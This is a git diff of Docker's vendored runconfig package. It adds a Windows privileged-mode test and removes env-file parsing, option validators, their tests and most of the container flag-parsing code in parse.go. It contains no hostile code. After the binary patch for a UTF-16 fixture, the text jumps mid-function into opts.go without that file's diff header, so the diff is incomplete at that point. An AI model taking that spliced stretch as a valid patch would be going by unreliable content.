b/vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go @@ -0,0 +1,17 @@ +// +build windows + +package runconfig // import "github.com/docker/docker/runconfig" + +import ( + "testing" + + "github.com/docker/docker/api/types/container" +) + +func TestValidatePrivileged(t *testing.T) { + expected := "Windows does not support privileged mode" + err := validatePrivileged(&container.HostConfig{Privileged: true}) + if err == nil || err.Error() != expected { + t.Fatalf("Expected %s", expected) + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile.go b/vendor/github.com/docker/docker/runconfig/opts/envfile.go deleted file mode 100644 index f723799215..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/envfile.go +++ /dev/null @@ -1,81 +0,0 @@ -package opts - -import ( - "bufio" - "bytes" - "fmt" - "os" - "strings" - "unicode" - "unicode/utf8" -) - -// ParseEnvFile reads a file with environment variables enumerated by lines -// -// ``Environment variable names used by the utilities in the Shell and -// Utilities volume of IEEE Std 1003.1-2001 consist solely of uppercase -// letters, digits, and the '_' (underscore) from the characters defined in -// Portable Character Set and do not begin with a digit. *But*, other -// characters may be permitted by an implementation; applications shall -// tolerate the presence of such names.'' -// -- http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap08.html -// -// As of #16585, it's up to application inside docker to validate or not -// environment variables, that's why we just strip leading whitespace and -// nothing more. -func ParseEnvFile(filename string) ([]string, error) { - fh, err := os.Open(filename) - if err != nil { - return []string{}, err - } - defer fh.Close() - - lines := []string{} - scanner := bufio.NewScanner(fh) - currentLine := 0 - utf8bom := []byte{0xEF, 0xBB, 0xBF} - for scanner.Scan() { - scannedBytes := scanner.Bytes() - if !utf8.Valid(scannedBytes) { - return []string{}, fmt.Errorf("env file %s contains invalid utf8 bytes at line %d: %v", filename, currentLine+1, scannedBytes) - } - // We trim UTF8 BOM - if currentLine == 0 { - scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) - } - // trim the line from all leading whitespace first - line := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace) - currentLine++ - // line is not empty, and not starting with '#' - if len(line) > 0 && !strings.HasPrefix(line, "#") { - data := strings.SplitN(line, "=", 2) - - // trim the front of a variable, but nothing else - variable := strings.TrimLeft(data[0], whiteSpaces) - if strings.ContainsAny(variable, whiteSpaces) { - return []string{}, ErrBadEnvVariable{fmt.Sprintf("variable '%s' has white spaces", variable)} - } - - if len(data) > 1 { - - // pass the value through, no trimming - lines = append(lines, fmt.Sprintf("%s=%s", variable, data[1])) - } else { - // if only a pass-through variable is given, clean it up. - lines = append(lines, fmt.Sprintf("%s=%s", strings.TrimSpace(line), os.Getenv(line))) - } - } - } - return lines, scanner.Err() -} - -var whiteSpaces = " \t" - -// ErrBadEnvVariable typed error for bad environment variable -type ErrBadEnvVariable struct { - msg string -} - -func (e ErrBadEnvVariable) Error() string { - return fmt.Sprintf("poorly formatted environment: %s", e.msg) -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go b/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go deleted file mode 100644 index 5dd7078bc0..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go +++ /dev/null @@ -1,142 +0,0 @@ -package opts - -import ( - "bufio" - "fmt" - "io/ioutil" - "os" - "reflect" - "strings" - "testing" -) - -func tmpFileWithContent(content string, t *testing.T) string { - tmpFile, err := ioutil.TempFile("", "envfile-test") - if err != nil { - t.Fatal(err) - } - defer tmpFile.Close() - - tmpFile.WriteString(content) - return tmpFile.Name() -} - -// Test ParseEnvFile for a file with a few well formatted lines -func TestParseEnvFileGoodFile(t *testing.T) { - content := `foo=bar - baz=quux -# comment - -_foobar=foobaz -with.dots=working -and_underscore=working too -` - // Adding a newline + a line with pure whitespace. - // This is being done like this instead of the block above - // because it's common for editors to trim trailing whitespace - // from lines, which becomes annoying since that's the - // exact thing we need to test. - content += "\n \t " - tmpFile := tmpFileWithContent(content, t) - defer os.Remove(tmpFile) - - lines, err := ParseEnvFile(tmpFile) - if err != nil { - t.Fatal(err) - } - - expectedLines := []string{ - "foo=bar", - "baz=quux", - "_foobar=foobaz", - "with.dots=working", - "and_underscore=working too", - } - - if !reflect.DeepEqual(lines, expectedLines) { - t.Fatal("lines not equal to expected_lines") - } -} - -// Test ParseEnvFile for an empty file -func TestParseEnvFileEmptyFile(t *testing.T) { - tmpFile := tmpFileWithContent("", t) - defer os.Remove(tmpFile) - - lines, err := ParseEnvFile(tmpFile) - if err != nil { - t.Fatal(err) - } - - if len(lines) != 0 { - t.Fatal("lines not empty; expected empty") - } -} - -// Test ParseEnvFile for a non existent file -func TestParseEnvFileNonExistentFile(t *testing.T) { - _, err := ParseEnvFile("foo_bar_baz") - if err == nil { - t.Fatal("ParseEnvFile succeeded; expected failure") - } - if _, ok := err.(*os.PathError); !ok { - t.Fatalf("Expected a PathError, got [%v]", err) - } -} - -// Test ParseEnvFile for a badly formatted file -func TestParseEnvFileBadlyFormattedFile(t *testing.T) { - content := `foo=bar - f =quux -` - - tmpFile := tmpFileWithContent(content, t) - defer os.Remove(tmpFile) - - _, err := ParseEnvFile(tmpFile) - if err == nil { - t.Fatalf("Expected an ErrBadEnvVariable, got nothing") - } - if _, ok := err.(ErrBadEnvVariable); !ok { - t.Fatalf("Expected an ErrBadEnvVariable, got [%v]", err) - } - expectedMessage := "poorly formatted environment: variable 'f ' has white spaces" - if err.Error() != expectedMessage { - t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error()) - } -} - -// Test ParseEnvFile for a file with a line exceeding bufio.MaxScanTokenSize -func TestParseEnvFileLineTooLongFile(t *testing.T) { - content := strings.Repeat("a", bufio.MaxScanTokenSize+42) - content = fmt.Sprint("foo=", content) - - tmpFile := tmpFileWithContent(content, t) - defer os.Remove(tmpFile) - - _, err := ParseEnvFile(tmpFile) - if err == nil { - t.Fatal("ParseEnvFile succeeded; expected failure") - } -} - -// ParseEnvFile with a random file, pass through -func TestParseEnvFileRandomFile(t *testing.T) { - content := `first line -another invalid line` - tmpFile := tmpFileWithContent(content, t) - defer os.Remove(tmpFile) - - _, err := ParseEnvFile(tmpFile) - - if err == nil { - t.Fatalf("Expected an ErrBadEnvVariable, got nothing") - } - if _, ok := err.(ErrBadEnvVariable); !ok { - t.Fatalf("Expected an ErrBadEnvvariable, got [%v]", err) - } - expectedMessage := "poorly formatted environment: variable 'first line' has white spaces" - if err.Error() != expectedMessage { - t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error()) - } -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env deleted file mode 100755 index 3a73358fffbc0d5d3d4df985ccf2f4a1a29cdb2a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 54 ucmezW&yB$!2yGdh7#tab7 1 { - return val, nil - } - if !doesEnvExist(val) { - return val, nil - } - return fmt.Sprintf("%s=%s", val, os.Getenv(val)), nil -} - -func doesEnvExist(name string) bool { - for _, entry := range os.Environ() { - parts := strings.SplitN(entry, "=", 2) - if runtime.GOOS == "windows" { - // Environment variable are case-insensitive on Windows. PaTh, path and PATH are equivalent. - if strings.EqualFold(parts[0], name) { - return true - } - } - if parts[0] == name { - return true - } - } - return false -} - -// ValidateExtraHost validates that the specified string is a valid extrahost and returns it. -// ExtraHost is in the form of name:ip where the ip has to be a valid ip (IPv4 or IPv6). -func ValidateExtraHost(val string) (string, error) { - // allow for IPv6 addresses in extra hosts by only splitting on first ":" - arr := strings.SplitN(val, ":", 2) - if len(arr) != 2 || len(arr[0]) == 0 { - return "", fmt.Errorf("bad format for add-host: %q", val) - } - if _, err := fopts.ValidateIPAddress(arr[1]); err != nil { - return "", fmt.Errorf("invalid IP address in add-host: %q", arr[1]) - } - return val, nil -} - -// ValidateMACAddress validates a MAC address. -func ValidateMACAddress(val string) (string, error) { - _, err := net.ParseMAC(strings.TrimSpace(val)) - if err != nil { - return "", err - } - return val, nil -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/opts_test.go b/vendor/github.com/docker/docker/runconfig/opts/opts_test.go deleted file mode 100644 index 43f8730fc4..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/opts_test.go +++ /dev/null @@ -1,113 +0,0 @@ -package opts - -import ( - "fmt" - "os" - "runtime" - "strings" - "testing" -) - -func TestValidateAttach(t *testing.T) { - valid := []string{ - "stdin", - "stdout", - "stderr", - "STDIN", - "STDOUT", - "STDERR", - } - if _, err := ValidateAttach("invalid"); err == nil { - t.Fatalf("Expected error with [valid streams are STDIN, STDOUT and STDERR], got nothing") - } - - for _, attach := range valid { - value, err := ValidateAttach(attach) - if err != nil { - t.Fatal(err) - } - if value != strings.ToLower(attach) { - t.Fatalf("Expected [%v], got [%v]", attach, value) - } - } -} - -func TestValidateEnv(t *testing.T) { - valids := map[string]string{ - "a": "a", - "something": "something", - "_=a": "_=a", - "env1=value1": "env1=value1", - "_env1=value1": "_env1=value1", - "env2=value2=value3": "env2=value2=value3", - "env3=abc!qwe": "env3=abc!qwe", - "env_4=value 4": "env_4=value 4", - "PATH": fmt.Sprintf("PATH=%v", os.Getenv("PATH")), - "PATH=something": "PATH=something", - "asd!qwe": "asd!qwe", - "1asd": "1asd", - "123": "123", - "some space": "some space", - " some space before": " some space before", - "some space after ": "some space after ", - } - // Environment variables are case in-sensitive on Windows - if runtime.GOOS == "windows" { - valids["PaTh"] = fmt.Sprintf("PaTh=%v", os.Getenv("PATH")) - } - for value, expected := range valids { - actual, err := ValidateEnv(value) - if err != nil { - t.Fatal(err) - } - if actual != expected { - t.Fatalf("Expected [%v], got [%v]", expected, actual) - } - } -} - -func TestValidateExtraHosts(t *testing.T) { - valid := []string{ - `myhost:192.168.0.1`, - `thathost:10.0.2.1`, - `anipv6host:2003:ab34:e::1`, - `ipv6local:::1`, - } - - invalid := map[string]string{ - `myhost:192.notanipaddress.1`: `invalid IP`, - `thathost-nosemicolon10.0.0.1`: `bad format`, - `anipv6host:::::1`: `invalid IP`, - `ipv6local:::0::`: `invalid IP`, - } - - for _, extrahost := range valid { - if _, err := ValidateExtraHost(extrahost); err != nil { - t.Fatalf("ValidateExtraHost(`"+extrahost+"`) should succeed: error %v", err) - } - } - - for extraHost, expectedError := range invalid { - if _, err := ValidateExtraHost(extraHost); err == nil { - t.Fatalf("ValidateExtraHost(`%q`) should have failed validation", extraHost) - } else { - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("ValidateExtraHost(`%q`) error should contain %q", extraHost, expectedError) - } - } - } -} - -func TestValidateMACAddress(t *testing.T) { - if _, err := ValidateMACAddress(`92:d0:c6:0a:29:33`); err != nil { - t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:29:33`) got %s", err) - } - - if _, err := ValidateMACAddress(`92:d0:c6:0a:33`); err == nil { - t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:33`) succeeded; expected failure on invalid MAC") - } - - if _, err := ValidateMACAddress(`random invalid string`); err == nil { - t.Fatalf("ValidateMACAddress(`random invalid string`) succeeded; expected failure on invalid MAC") - } -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse.go b/vendor/github.com/docker/docker/runconfig/opts/parse.go index 71a89277ec..8f7baeb637 100644 --- a/vendor/github.com/docker/docker/runconfig/opts/parse.go +++ b/vendor/github.com/docker/docker/runconfig/opts/parse.go @@ -1,695 +1,9 @@ -package opts +package opts // import "github.com/docker/docker/runconfig/opts" import ( - "bytes" - "encoding/json" - "fmt" - "io/ioutil" - "path" - "strconv" "strings" - "time" - - "github.com/docker/docker/api/types/container" - networktypes "github.com/docker/docker/api/types/network" - "github.com/docker/docker/api/types/strslice" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/signal" - "github.com/docker/go-connections/nat" - units "github.com/docker/go-units" - "github.com/spf13/pflag" ) -// ContainerOptions is a data object with all the options for creating a container -type ContainerOptions struct { - attach opts.ListOpts - volumes opts.ListOpts - tmpfs opts.ListOpts - blkioWeightDevice WeightdeviceOpt - deviceReadBps ThrottledeviceOpt - deviceWriteBps ThrottledeviceOpt - links opts.ListOpts - aliases opts.ListOpts - linkLocalIPs opts.ListOpts - deviceReadIOps ThrottledeviceOpt - deviceWriteIOps ThrottledeviceOpt - env opts.ListOpts - labels opts.ListOpts - devices opts.ListOpts - ulimits *UlimitOpt - sysctls *opts.MapOpts - publish opts.ListOpts - expose opts.ListOpts - dns opts.ListOpts - dnsSearch opts.ListOpts - dnsOptions opts.ListOpts - extraHosts opts.ListOpts - volumesFrom opts.ListOpts - envFile opts.ListOpts - capAdd opts.ListOpts - capDrop opts.ListOpts - groupAdd opts.ListOpts - securityOpt opts.ListOpts - storageOpt opts.ListOpts - labelsFile opts.ListOpts - loggingOpts opts.ListOpts - privileged bool - pidMode string - utsMode string - usernsMode string - publishAll bool - stdin bool - tty bool - oomKillDisable bool - oomScoreAdj int - containerIDFile string - entrypoint string - hostname string - memoryString string - memoryReservation string - memorySwap string - kernelMemory string - user string - workingDir string - cpuCount int64 - cpuShares int64 - cpuPercent int64 - cpuPeriod int64 - cpuRealtimePeriod int64 - cpuRealtimeRuntime int64 - cpuQuota int64 - cpus opts.NanoCPUs - cpusetCpus string - cpusetMems string - blkioWeight uint16 - ioMaxBandwidth string - ioMaxIOps uint64 - swappiness int64 - netMode string - macAddress string - ipv4Address string - ipv6Address string - ipcMode string - pidsLimit int64 - restartPolicy string - readonlyRootfs bool - loggingDriver string - cgroupParent string - volumeDriver string - stopSignal string - stopTimeout int - isolation string - shmSize string - noHealthcheck bool - healthCmd string - healthInterval time.Duration - healthTimeout time.Duration - healthRetries int - runtime string - autoRemove bool - init bool - initPath string - credentialSpec string - - Image string - Args []string -} - -// AddFlags adds all command line flags that will be used by Parse to the FlagSet -func AddFlags(flags *pflag.FlagSet) *ContainerOptions { - copts := &ContainerOptions{ - aliases: opts.NewListOpts(nil), - attach: opts.NewListOpts(ValidateAttach), - blkioWeightDevice: NewWeightdeviceOpt(ValidateWeightDevice), - capAdd: opts.NewListOpts(nil), - capDrop: opts.NewListOpts(nil), - dns: opts.NewListOpts(opts.ValidateIPAddress), - dnsOptions: opts.NewListOpts(nil), - dnsSearch: opts.NewListOpts(opts.ValidateDNSSearch), - deviceReadBps: NewThrottledeviceOpt(ValidateThrottleBpsDevice), - deviceReadIOps: NewThrottledeviceOpt(ValidateThrottleIOpsDevice), - deviceWriteBps: NewThrottledeviceOpt(ValidateThrottleBpsDevice), - deviceWriteIOps: NewThrottledeviceOpt(ValidateThrottleIOpsDevice), - devices: opts.NewListOpts(ValidateDevice), - env: opts.NewListOpts(ValidateEnv), - envFile: opts.NewListOpts(nil), - expose: opts.NewListOpts(nil), - extraHosts: opts.NewListOpts(ValidateExtraHost), - groupAdd: opts.NewListOpts(nil), - labels: opts.NewListOpts(ValidateEnv), - labelsFile: opts.NewListOpts(nil), - linkLocalIPs: opts.NewListOpts(nil), - links: opts.NewListOpts(ValidateLink), - loggingOpts: opts.NewListOpts(nil), - publish: opts.NewListOpts(nil), - securityOpt: opts.NewListOpts(nil), - storageOpt: opts.NewListOpts(nil), - sysctls: opts.NewMapOpts(nil, opts.ValidateSysctl), - tmpfs: opts.NewListOpts(nil), - ulimits: NewUlimitOpt(nil), - volumes: opts.NewListOpts(nil), - volumesFrom: opts.NewListOpts(nil), - } - - // General purpose flags - flags.VarP(&copts.attach, "attach", "a", "Attach to STDIN, STDOUT or STDERR") - flags.Var(&copts.devices, "device", "Add a host device to the container") - flags.VarP(&copts.env, "env", "e", "Set environment variables") - flags.Var(&copts.envFile, "env-file", "Read in a file of environment variables") - flags.StringVar(&copts.entrypoint, "entrypoint", "", "Overwrite the default ENTRYPOINT of the image") - flags.Var(&copts.groupAdd, "group-add", "Add additional groups to join") - flags.StringVarP(&copts.hostname, "hostname", "h", "", "Container host name") - flags.BoolVarP(&copts.stdin, "interactive", "i", false, "Keep STDIN open even if not attached") - flags.VarP(&copts.labels, "label", "l", "Set meta data on a container") - flags.Var(&copts.labelsFile, "label-file", "Read in a line delimited file of labels") - flags.BoolVar(&copts.readonlyRootfs, "read-only", false, "Mount the container's root filesystem as read only") - flags.StringVar(&copts.restartPolicy, "restart", "no", "Restart policy to apply when a container exits") - flags.StringVar(&copts.stopSignal, "stop-signal", signal.DefaultStopSignal, fmt.Sprintf("Signal to stop a container, %v by default", signal.DefaultStopSignal)) - flags.IntVar(&copts.stopTimeout, "stop-timeout", 0, "Timeout (in seconds) to stop a container") - flags.SetAnnotation("stop-timeout", "version", []string{"1.25"}) - flags.Var(copts.sysctls, "sysctl", "Sysctl options") - flags.BoolVarP(&copts.tty, "tty", "t", false, "Allocate a pseudo-TTY") - flags.Var(copts.ulimits, "ulimit", "Ulimit options") - flags.StringVarP(&copts.user, "user", "u", "", "Username or UID (format: [:])") - flags.StringVarP(&copts.workingDir, "workdir", "w", "", "Working directory inside the container") - flags.BoolVar(&copts.autoRemove, "rm", false, "Automatically remove the container when it exits") - - // Security - flags.Var(&copts.capAdd, "cap-add", "Add Linux capabilities") - flags.Var(&copts.capDrop, "cap-drop", "Drop Linux capabilities") - flags.BoolVar(&copts.privileged, "privileged", false, "Give extended privileges to this container") - flags.Var(&copts.securityOpt, "security-opt", "Security Options") - flags.StringVar(&copts.usernsMode, "userns", "", "User namespace to use") - flags.StringVar(&copts.credentialSpec, "credentialspec", "", "Credential spec for managed service account (Windows only)") - - // Network and port publishing flag - flags.Var(&copts.extraHosts, "add-host", "Add a custom host-to-IP mapping (host:ip)") - flags.Var(&copts.dns, "dns", "Set custom DNS servers") - // We allow for both "--dns-opt" and "--dns-option", although the latter is the recommended way. - // This is to be consistent with service create/update - flags.Var(&copts.dnsOptions, "dns-opt", "Set DNS options") - flags.Var(&copts.dnsOptions, "dns-option", "Set DNS options") - flags.MarkHidden("dns-opt") - flags.Var(&copts.dnsSearch, "dns-search", "Set custom DNS search domains") - flags.Var(&copts.expose, "expose", "Expose a port or a range of ports") - flags.StringVar(&copts.ipv4Address, "ip", "", "Container IPv4 address (e.g. 172.30.100.104)") - flags.StringVar(&copts.ipv6Address, "ip6", "", "Container IPv6 address (e.g. 2001:db8::33)") - flags.Var(&copts.links, "link", "Add link to another container") - flags.Var(&copts.linkLocalIPs, "link-local-ip", "Container IPv4/IPv6 link-local addresses") - flags.StringVar(&copts.macAddress, "mac-address", "", "Container MAC address (e.g. 92:d0:c6:0a:29:33)") - flags.VarP(&copts.publish, "publish", "p", "Publish a container's port(s) to the host") - flags.BoolVarP(&copts.publishAll, "publish-all", "P", false, "Publish all exposed ports to random ports") - // We allow for both "--net" and "--network", although the latter is the recommended way. - flags.StringVar(&copts.netMode, "net", "default", "Connect a container to a network") - flags.StringVar(&copts.netMode, "network", "default", "Connect a container to a network") - flags.MarkHidden("net") - // We allow for both "--net-alias" and "--network-alias", although the latter is the recommended way. - flags.Var(&copts.aliases, "net-alias", "Add network-scoped alias for the container") - flags.Var(&copts.aliases, "network-alias", "Add network-scoped alias for the container") - flags.MarkHidden("net-alias") - - // Logging and storage - flags.StringVar(&copts.loggingDriver, "log-driver", "", "Logging driver for the container") - flags.StringVar(&copts.volumeDriver, "volume-driver", "", "Optional volume driver for the container") - flags.Var(&copts.loggingOpts, "log-opt", "Log driver options") - flags.Var(&copts.storageOpt, "storage-opt", "Storage driver options for the container") - flags.Var(&copts.tmpfs, "tmpfs", "Mount a tmpfs directory") - flags.Var(&copts.volumesFrom, "volumes-from", "Mount volumes from the specified container(s)") - flags.VarP(&copts.volumes, "volume", "v", "Bind mount a volume") - - // Health-checking - flags.StringVar(&copts.healthCmd, "health-cmd", "", "Command to run to check health") - flags.DurationVar(&copts.healthInterval, "health-interval", 0, "Time between running the check (ns|us|ms|s|m|h) (default 0s)") - flags.IntVar(&copts.healthRetries, "health-retries", 0, "Consecutive failures needed to report unhealthy") - flags.DurationVar(&copts.healthTimeout, "health-timeout", 0, "Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)") - flags.BoolVar(&copts.noHealthcheck, "no-healthcheck", false, "Disable any container-specified HEALTHCHECK") - - // Resource management - flags.Uint16Var(&copts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)") - flags.Var(&copts.blkioWeightDevice, "blkio-weight-device", "Block IO weight (relative device weight)") - flags.StringVar(&copts.containerIDFile, "cidfile", "", "Write the container ID to the file") - flags.StringVar(&copts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") - flags.StringVar(&copts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") - flags.Int64Var(&copts.cpuCount, "cpu-count", 0, "CPU count (Windows only)") - flags.Int64Var(&copts.cpuPercent, "cpu-percent", 0, "CPU percent (Windows only)") - flags.Int64Var(&copts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period") - flags.Int64Var(&copts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota") - flags.Int64Var(&copts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit CPU real-time period in microseconds") - flags.Int64Var(&copts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit CPU real-time runtime in microseconds") - flags.Int64VarP(&copts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") - flags.Var(&copts.cpus, "cpus", "Number of CPUs") - flags.Var(&copts.deviceReadBps, "device-read-bps", "Limit read rate (bytes per second) from a device") - flags.Var(&copts.deviceReadIOps, "device-read-iops", "Limit read rate (IO per second) from a device") - flags.Var(&copts.deviceWriteBps, "device-write-bps", "Limit write rate (bytes per second) to a device") - flags.Var(&copts.deviceWriteIOps, "device-write-iops", "Limit write rate (IO per second) to a device") - flags.StringVar(&copts.ioMaxBandwidth, "io-maxbandwidth", "", "Maximum IO bandwidth limit for the system drive (Windows only)") - flags.Uint64Var(&copts.ioMaxIOps, "io-maxiops", 0, "Maximum IOps limit for the system drive (Windows only)") - flags.StringVar(&copts.kernelMemory, "kernel-memory", "", "Kernel memory limit") - flags.StringVarP(&copts.memoryString, "memory", "m", "", "Memory limit") - flags.StringVar(&copts.memoryReservation, "memory-reservation", "", "Memory soft limit") - flags.StringVar(&copts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") - flags.Int64Var(&copts.swappiness, "memory-swappiness", -1, "Tune container memory swappiness (0 to 100)") - flags.BoolVar(&copts.oomKillDisable, "oom-kill-disable", false, "Disable OOM Killer") - flags.IntVar(&copts.oomScoreAdj, "oom-score-adj", 0, "Tune host's OOM preferences (-1000 to 1000)") - flags.Int64Var(&copts.pidsLimit, "pids-limit", 0, "Tune container pids limit (set -1 for unlimited)") - - // Low-level execution (cgroups, namespaces, ...) - flags.StringVar(&copts.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container") - flags.StringVar(&copts.ipcMode, "ipc", "", "IPC namespace to use") - flags.StringVar(&copts.isolation, "isolation", "", "Container isolation technology") - flags.StringVar(&copts.pidMode, "pid", "", "PID namespace to use") - flags.StringVar(&copts.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB") - flags.StringVar(&copts.utsMode, "uts", "", "UTS namespace to use") - flags.StringVar(&copts.runtime, "runtime", "", "Runtime to use for this container") - - flags.BoolVar(&copts.init, "init", false, "Run an init inside the container that forwards signals and reaps processes") - flags.StringVar(&copts.initPath, "init-path", "", "Path to the docker-init binary") - return copts -} - -// Parse parses the args for the specified command and generates a Config, -// a HostConfig and returns them with the specified command. -// If the specified args are not valid, it will return an error. -func Parse(flags *pflag.FlagSet, copts *ContainerOptions) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { - var ( - attachStdin = copts.attach.Get("stdin") - attachStdout = copts.attach.Get("stdout") - attachStderr = copts.attach.Get("stderr") - ) - - // Validate the input mac address - if copts.macAddress != "" { - if _, err := ValidateMACAddress(copts.macAddress); err != nil { - return nil, nil, nil, fmt.Errorf("%s is not a valid mac address", copts.macAddress) - } - } - if copts.stdin { - attachStdin = true - } - // If -a is not set, attach to stdout and stderr - if copts.attach.Len() == 0 { - attachStdout = true - attachStderr = true - } - - var err error - - var memory int64 - if copts.memoryString != "" { - memory, err = units.RAMInBytes(copts.memoryString) - if err != nil { - return nil, nil, nil, err - } - } - - var memoryReservation int64 - if copts.memoryReservation != "" { - memoryReservation, err = units.RAMInBytes(copts.memoryReservation) - if err != nil { - return nil, nil, nil, err - } - } - - var memorySwap int64 - if copts.memorySwap != "" { - if copts.memorySwap == "-1" { - memorySwap = -1 - } else { - memorySwap, err = units.RAMInBytes(copts.memorySwap) - if err != nil { - return nil, nil, nil, err - } - } - } - - var kernelMemory int64 - if copts.kernelMemory != "" { - kernelMemory, err = units.RAMInBytes(copts.kernelMemory) - if err != nil { - return nil, nil, nil, err - } - } - - swappiness := copts.swappiness - if swappiness != -1 && (swappiness < 0 || swappiness > 100) { - return nil, nil, nil, fmt.Errorf("invalid value: %d. Valid memory swappiness range is 0-100", swappiness) - } - - var shmSize int64 - if copts.shmSize != "" { - shmSize, err = units.RAMInBytes(copts.shmSize) - if err != nil { - return nil, nil, nil, err - } - } - - // TODO FIXME units.RAMInBytes should have a uint64 version - var maxIOBandwidth int64 - if copts.ioMaxBandwidth != "" { - maxIOBandwidth, err = units.RAMInBytes(copts.ioMaxBandwidth) - if err != nil { - return nil, nil, nil, err - } - if maxIOBandwidth < 0 { - return nil, nil, nil, fmt.Errorf("invalid value: %s. Maximum IO Bandwidth must be positive", copts.ioMaxBandwidth) - } - } - - var binds []string - volumes := copts.volumes.GetMap() - // add any bind targets to the list of container volumes - for bind := range copts.volumes.GetMap() { - if arr := volumeSplitN(bind, 2); len(arr) > 1 { - // after creating the bind mount we want to delete it from the copts.volumes values because - // we do not want bind mounts being committed to image configs - binds = append(binds, bind) - // We should delete from the map (`volumes`) here, as deleting from copts.volumes will not work if - // there are duplicates entries. - delete(volumes, bind) - } - } - - // Can't evaluate options passed into --tmpfs until we actually mount - tmpfs := make(map[string]string) - for _, t := range copts.tmpfs.GetAll() { - if arr := strings.SplitN(t, ":", 2); len(arr) > 1 { - tmpfs[arr[0]] = arr[1] - } else { - tmpfs[arr[0]] = "" - } - } - - var ( - runCmd strslice.StrSlice - entrypoint strslice.StrSlice - ) - - if len(copts.Args) > 0 { - runCmd = strslice.StrSlice(copts.Args) - } - - if copts.entrypoint != "" { - entrypoint = strslice.StrSlice{copts.entrypoint} - } else if flags.Changed("entrypoint") { - // if `--entrypoint=` is parsed then Entrypoint is reset - entrypoint = []string{""} - } - - ports, portBindings, err := nat.ParsePortSpecs(copts.publish.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - // Merge in exposed ports to the map of published ports - for _, e := range copts.expose.GetAll() { - if strings.Contains(e, ":") { - return nil, nil, nil, fmt.Errorf("invalid port format for --expose: %s", e) - } - //support two formats for expose, original format /[] or /[] - proto, port := nat.SplitProtoPort(e) - //parse the start and end port and create a sequence of ports to expose - //if expose a port, the start and end port are the same - start, end, err := nat.ParsePortRange(port) - if err != nil { - return nil, nil, nil, fmt.Errorf("invalid range format for --expose: %s, error: %s", e, err) - } - for i := start; i <= end; i++ { - p, err := nat.NewPort(proto, strconv.FormatUint(i, 10)) - if err != nil { - return nil, nil, nil, err - } - if _, exists := ports[p]; !exists { - ports[p] = struct{}{} - } - } - } - - // parse device mappings - deviceMappings := []container.DeviceMapping{} - for _, device := range copts.devices.GetAll() { - deviceMapping, err := ParseDevice(device) - if err != nil { - return nil, nil, nil, err - } - deviceMappings = append(deviceMappings, deviceMapping) - } - - // collect all the environment variables for the container - envVariables, err := ReadKVStrings(copts.envFile.GetAll(), copts.env.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - // collect all the labels for the container - labels, err := ReadKVStrings(copts.labelsFile.GetAll(), copts.labels.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - ipcMode := container.IpcMode(copts.ipcMode) - if !ipcMode.Valid() { - return nil, nil, nil, fmt.Errorf("--ipc: invalid IPC mode") - } - - pidMode := container.PidMode(copts.pidMode) - if !pidMode.Valid() { - return nil, nil, nil, fmt.Errorf("--pid: invalid PID mode") - } - - utsMode := container.UTSMode(copts.utsMode) - if !utsMode.Valid() { - return nil, nil, nil, fmt.Errorf("--uts: invalid UTS mode") - } - - usernsMode := container.UsernsMode(copts.usernsMode) - if !usernsMode.Valid() { - return nil, nil, nil, fmt.Errorf("--userns: invalid USER mode") - } - - restartPolicy, err := ParseRestartPolicy(copts.restartPolicy) - if err != nil { - return nil, nil, nil, err - } - - loggingOpts, err := parseLoggingOpts(copts.loggingDriver, copts.loggingOpts.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - securityOpts, err := parseSecurityOpts(copts.securityOpt.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - storageOpts, err := parseStorageOpts(copts.storageOpt.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - // Healthcheck - var healthConfig *container.HealthConfig - haveHealthSettings := copts.healthCmd != "" || - copts.healthInterval != 0 || - copts.healthTimeout != 0 || - copts.healthRetries != 0 - if copts.noHealthcheck { - if haveHealthSettings { - return nil, nil, nil, fmt.Errorf("--no-healthcheck conflicts with --health-* options") - } - test := strslice.StrSlice{"NONE"} - healthConfig = &container.HealthConfig{Test: test} - } else if haveHealthSettings { - var probe strslice.StrSlice - if copts.healthCmd != "" { - args := []string{"CMD-SHELL", copts.healthCmd} - probe = strslice.StrSlice(args) - } - if copts.healthInterval < 0 { - return nil, nil, nil, fmt.Errorf("--health-interval cannot be negative") - } - if copts.healthTimeout < 0 { - return nil, nil, nil, fmt.Errorf("--health-timeout cannot be negative") - } - - 